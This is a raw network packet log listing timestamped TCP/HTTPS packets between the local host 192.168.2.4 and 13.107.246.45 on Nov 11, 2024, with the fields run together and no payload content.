                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.137772083 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.137943983 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.139103889 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.139122009 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.139172077 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.139951944 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.139981985 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140041113 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140126944 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140140057 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140285969 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140312910 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140849113 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140851974 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140860081 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.140872955 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.766614914 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.767874956 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.768233061 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.768255949 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.768769026 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.768775940 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769057989 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769074917 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769165039 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769457102 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769464970 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769548893 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769551992 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769850969 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.769854069 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.770787954 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.770876884 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771126032 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771137953 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771490097 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771495104 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771575928 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771596909 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771898985 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.771903992 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861367941 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861421108 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861593962 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861797094 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861816883 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861829996 CET49803443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.861835957 CET4434980313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.862185001 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.862231970 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.862274885 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863374949 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863392115 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863401890 CET49800443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863408089 CET4434980013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863497972 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863545895 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.863588095 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.864655972 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.864691019 CET49802443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.864695072 CET4434980213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.864706039 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.864758015 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.866231918 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.866269112 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.866338015 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.867014885 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.867079973 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.867122889 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868232012 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868257046 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868316889 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868464947 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868475914 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868623972 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868630886 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868642092 CET49804443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868645906 CET4434980413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868812084 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.868829012 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.869642019 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.869651079 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.869663000 CET49801443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.869667053 CET4434980113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.870488882 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.870498896 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.870609045 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.871700048 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.871718884 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.871798992 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.871867895 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.871881008 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.872773886 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.872790098 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.872844934 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.872948885 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.872958899 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.873034000 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:02.873049974 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.389231920 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.389508963 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.389642000 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.389887094 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.390877962 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.390894890 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.390913010 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.391410112 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.391416073 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.391717911 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.391741037 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392132044 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392138004 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392363071 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392374992 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392745972 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392751932 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.392977953 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393007994 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393328905 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393333912 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393558979 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393580914 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393925905 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.393929958 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.483753920 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.483753920 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.483877897 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.483964920 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484055996 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484107971 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484334946 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484350920 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484363079 CET49807443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484369040 CET4434980713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484400034 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484724998 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.484771013 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485188007 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485848904 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485852957 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485863924 CET49805443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485867977 CET4434980513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485925913 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.485968113 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.486987114 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.487004042 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.487018108 CET49809443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.487025023 CET4434980913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.487972021 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.487988949 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.488001108 CET49808443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.488007069 CET4434980813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.489129066 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.489208937 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.489257097 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490763903 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490788937 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490838051 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490900040 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490914106 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490922928 CET49806443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.490928888 CET4434980613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.492837906 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.492856979 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.492899895 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.493001938 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.493014097 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.494009972 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.494029045 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.494074106 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.494177103 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.494187117 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.495443106 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.495457888 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.495522976 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.495615005 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.495623112 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496160030 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496179104 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496237040 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496296883 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496308088 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496390104 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:03.496407032 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.030246019 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.030262947 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.030869007 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.031054020 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.031111002 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.032098055 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.032135010 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.032675028 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.032682896 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.032939911 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.032963991 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.033312082 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.033318043 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.033508062 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.033525944 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.033863068 CET49812443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.033874989 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034079075 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034090996 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034430027 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034435034 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034648895 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034674883 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034989119 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.034997940 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124180079 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124258041 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124469995 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124641895 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124663115 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124679089 CET49811443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.124684095 CET4434981113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125253916 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125313997 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125363111 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125364065 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125407934 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125451088 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125510931 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125566959 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.125610113 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126717091 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126735926 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126745939 CET49813443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126751900 CET4434981313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126878977 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126904011 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126915932 CET49814443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.126920938 CET4434981413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.127403021 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.127429008 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.127444983 CET49810443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.127449989 CET4434981013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.129565954 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.129589081 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.129683018 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.129930019 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.129960060 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130016088 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130491972 CET49815443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130501986 CET4434981513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130573034 CET49816443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130587101 CET4434981613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130603075 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130644083 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130697966 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130764961 CET49817443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.130774975 CET4434981713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.131648064 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.131655931 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.131711006 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.131793022 CET49818443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.131804943 CET4434981813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567012072 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567152023 CET4434981213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:37:04.567224979 CET49812443192.168.2.413.107.246.45
